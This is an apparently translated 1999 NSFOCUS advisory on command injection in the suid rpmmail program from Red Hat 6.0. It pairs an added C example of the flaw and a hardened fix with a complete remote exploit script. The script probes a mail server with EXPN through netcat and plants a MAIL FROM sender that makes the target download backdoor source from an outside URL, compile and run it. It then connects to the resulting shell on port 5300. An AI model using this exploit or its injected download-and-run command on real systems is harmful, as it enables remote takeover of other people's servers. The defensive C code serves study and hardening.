NSFOCUS Security Monthly, Issue 4: Latest Vulnerabilities
Smail-3.2 (rpmmail) command execution vulnerability

Date: 1999-12-14

Vulnerability type: remote, local

Published: 1999-10-20
Updated: 1999-11-29

Affected systems:
Red Hat 6.0
  
Description:

The Smail-3.2 (rpmmail) package shipped on the Red Hat 6.0 Extra Applications CD installs /home/rpmmail/rpmmail suid root and runs it from a .forward file for mail delivered to the rpmmail account. The program hands part of the incoming message (the exploit below uses the envelope sender given in MAIL FROM) to system(3) without filtering shell metacharacters, so a crafted message sent to rpmmail@vulnerablehost executes attacker-chosen commands, remotely or locally. Whether those commands run as root depends on what /bin/sh is: where it is bash version 2, which drops privileges on startup when the effective uid differs from the real uid, the result is command execution as an unprivileged user; on other systems it is root.
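To make the mechanism concrete, the following C program is an added example, not rpmmail's source (which this page does not reproduce). It shows the vulnerable pattern, a suid helper that pastes the envelope sender into a command line for system(3), an allowlist check that would have rejected the sender the exploit sends, and a replacement that runs the mailer without a shell and drops to the real uid itself rather than relying on bash 2 to do so. The `/usr/sbin/sendmail -f` command line, the `sender_is_safe` rules and the `run_mailer_noshell` helper are assumptions made for illustration; the malicious sender string is constructed in the shape of the exploit's MAIL FROM, with spaces in place of its `\x20` sequences and a placeholder URL.

```c
/* Added example: unsafe system(3) on an envelope sender vs. a no-shell
 * replacement.  Not rpmmail's code; the mailer command line is assumed. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern (hypothetical): the sender becomes part of a string
 * that system(3) would pass to "/bin/sh -c".  Nothing escapes ';' or '|'. */
int build_shell_cmd(char *out, size_t outlen, const char *sender)
{
    int n = snprintf(out, outlen, "/usr/sbin/sendmail -f %s -t", sender);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Does the command line system(3) would receive contain this substring?
 * Used to show where an injected command lands. */
int shell_cmd_contains(const char *sender, const char *needle)
{
    char cmd[512];
    if (build_shell_cmd(cmd, sizeof cmd, sender) < 0)
        return 0;
    return strstr(cmd, needle) != NULL;
}

/* Offset of the first shell-significant byte in sender, or -1.  A ';' here
 * ends the mailer command and starts an attacker-chosen one. */
int first_shell_metachar(const char *sender)
{
    const char *meta = ";|&`$()<>\n\r \t'\"\\";
    size_t i;
    for (i = 0; sender[i]; i++)
        if (strchr(meta, sender[i]))
            return (int)i;
    return -1;
}

/* Allowlist validation of an envelope address: letters, digits, a few
 * address punctuation characters, exactly one '@', bounded length. */
int sender_is_safe(const char *sender)
{
    size_t len = strlen(sender), i;
    int at = 0;
    if (len == 0 || len > 254)
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)sender[i];
        if (c == '@') { at++; continue; }
        if (isalnum(c) || strchr("._%+-", c))
            continue;
        return 0;
    }
    return at == 1;
}

/* Hardened replacement: no shell at all.  The sender is a single argv
 * element, so ';' or spaces inside it reach the mailer literally, and the
 * helper drops to the caller's real uid/gid before exec instead of trusting
 * the shell to do it.  Returns the child's exit status, or -1. */
int run_mailer_noshell(const char *mailer, const char *sender)
{
    pid_t pid;
    int status;

    if (!sender_is_safe(sender))
        return -1;                       /* reject before doing anything */
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)mailer, "-f", (char *)sender, "-t", NULL };
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(127);
        execv(mailer, argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sender in the shape of the exploit's MAIL FROM. */
    const char *evil = ";lynx -dump http://example.invalid/blackhole.c >unf.c ;gcc -o unf unf.c ;./unf &;";
    char cmd[512];

    build_shell_cmd(cmd, sizeof cmd, evil);
    printf("system(3) would run: %s\n", cmd);
    printf("first metachar at offset %d\n", first_shell_metachar(evil));
    printf("safe? evil=%d good=%d\n", sender_is_safe(evil),
           sender_is_safe("user@example.com"));
    /* /bin/echo stands in for the mailer: the address arrives as one argument. */
    return run_mailer_noshell("/bin/echo", "user@example.com") == 0 ? 0 : 1;
}
```

The point of the last function is that it removes the shell from the path entirely; the advisory's observation that bash 2 happens to drop privileges is a property of one shell build, not a control a suid program should depend on.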
  
Proof of concept:
  
#!/bin/sh
# remote root exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com]
# greets to:
# all of gH, "Brock Tellier" for discovering the hole.
# special greets to:
# icesk, mosthated, elux, rhodie, and the rest of #bifemlinux @ undernet
# ---- Brock Tellier's original advisory
# Greetings,
#
# A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0
# Extra Applications CD. The potential compromise for this bug could be remote
# or local root or simply remote command execution as "nobody" or similar,
# depending on your system configuration.
#
# By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can
# get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward remotely)
# to system(3) any command you wish. The command executed does not necessarily
# have root privs because of bash's handling of euid != uid of caller. Although
# system(3) calls /bin/sh -c, it is linked by default (can anyone verify
# these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2. From the
# system(3) man page:
#
# system() will not, in fact, work properly from programs
# with suid or sgid privileges on systems on which
# /bin/sh is bash version 2, since bash 2 drops privileges
# on startup. (Debian uses a modified bash which does not
# do this when invoked as sh.)
#
# Thus some systems with rpmmail installed are vulnerable to local/remote root,
# all others to remote command execution as an unpriv'd user.
# --- end Brock's text

# you need to have backdoor source somewhere out on the net
BACKDOOR="http://meltingpot.fortunecity.com/rundberg/521/blackhole.c"

if [ "$1" = "" ]; then
echo "usage: $0 <hostname>"
exit 0
fi

if [ -z "`which nc`" ]; then
echo "this script requires netcat [nc]"
exit 0
fi

rmt=`host $1 | grep -i "$1" | grep -i "has address" | awk '{print $4}'`
if [ "$rmt" = "" ]; then
echo "unable to obtain address for $1"
exit 0
fi

echo "= remote exploit for Smail-3.2 (rpmmail) by ben-z [bentothez@phayze.com] ="
echo -n "[**]: Making sure the system is vulnerable.. "
# EXPN on the rpmmail alias shows whether mail to it is piped into rpmmail -c
(sleep 1;echo "EXPN rpmmail";sleep 1)|nc -w 4 $1 25 >vuln.tmp 2>&1
cat vuln.tmp | grep "250" | grep "rpmmail -c" >/dev/null 2>&1
if [ ! $? -eq 0 ]; then
echo "no!"
exit 0
fi
echo "yes!"

echo -n "[**]: Setting up our tcp bound shell.. "
# the envelope sender is what ends up in system(3); the \x20 sequences are
# sent exactly as the author wrote them, and $BACKDOOR must expand here
(sleep 1;echo "MAIL FROM: ;lynx\x20-dump\x20$BACKDOOR\x201>unf.c\x202>unf.c\x20;gcc\x20-o\x20unf\x20unf.c\x20;./unf\x20&;";
 sleep 1;echo "RCPT TO: rpmmail";
 sleep 1;echo "DATA";
 sleep 1;echo "unf";echo ".";
 sleep 2;echo "quit")|nc -w 4 $1 25 >vuln.tmp 2>&1
cat vuln.tmp | grep -i " 250 Mail accepted" >/dev/null 2>&1
if [ ! $? -eq 0 ]; then
echo "failed!"
exit 0
fi
echo "success!"

echo -n "[**]: Attempting to obtain access.. "
# the compiled backdoor is expected to listen on tcp/5300
nc -w 3 $1 5300
echo "done."

echo -n "[**]: Cleaning up local mess.. "
rm vuln.tmp
killall -9 nc >/dev/null 2>&1
echo "done."

All rights reserved. No reproduction without permission.